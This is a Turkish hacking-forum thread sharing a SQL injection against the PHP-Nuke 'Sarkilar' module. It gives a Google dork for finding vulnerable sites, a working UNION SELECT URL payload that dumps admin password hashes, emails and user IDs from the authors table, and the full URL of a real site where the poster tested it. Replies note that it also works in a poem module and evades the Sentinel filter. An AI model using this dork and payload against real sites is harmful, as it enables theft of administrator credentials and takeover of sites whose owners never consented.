Phpnuke Sarkilar Module Sql İnjection

1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    EcHoLL
    EcHoLL's avatar
    Erkek

google araması: ?name=Sarkilar

injection: modules.php?name=Sarkilar&op=showcontent&id=-7+union+select+null,null,pwd,email,user_uid,null,null,null,null+from+nuke_authors

test edilen illegal site: http://www.hebuname.com/modules.php?name=Sarkilar&op=showcontent&id=-7+union+select+null,null,pwd,email,user_uid,null,null,null,null+from+hebuname_authors

"Hayat zor olabilir ama ben de kolay sayılmam." insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Sigortacı
    DJ_Alper
    DJ_Alper's avatar
    Bilgi/Destek Madalyası
    Erkek
    sarkilar diye modülü yok onun siir modülünden çevirme :) siir modülündede işe yarar yani

Sorularınızı cilginsigortaci@gmail.com a yazabilirsiniz cevaplar instagram sayfasında >>>instagram/cilginsigortaci/ █║▌│█│║▌║││█║▌║▌║
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    EcHoLL
    EcHoLL's avatar
    Erkek
    beni baglmaz ne modulu oldugu :P

"Hayat zor olabilir ama ben de kolay sayılmam." insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Sigortacı
    DJ_Alper
    DJ_Alper's avatar
    Bilgi/Destek Madalyası
    Erkek
    EcHoLL bunu yazdı:
    -----------------------------
    beni baglmaz ne modulu oldugu :P
    -----------------------------

benim eski nukelerdede vardı kullanırken ben kaıpatmıştım açığı bazı zaman sentinal görmüyo bunru

Sorularınızı cilginsigortaci@gmail.com a yazabilirsiniz cevaplar instagram sayfasında >>>instagram/cilginsigortaci/ █║▌│█│║▌║││█║▌║▌║
Toplam Hit: 961 Toplam Mesaj: 4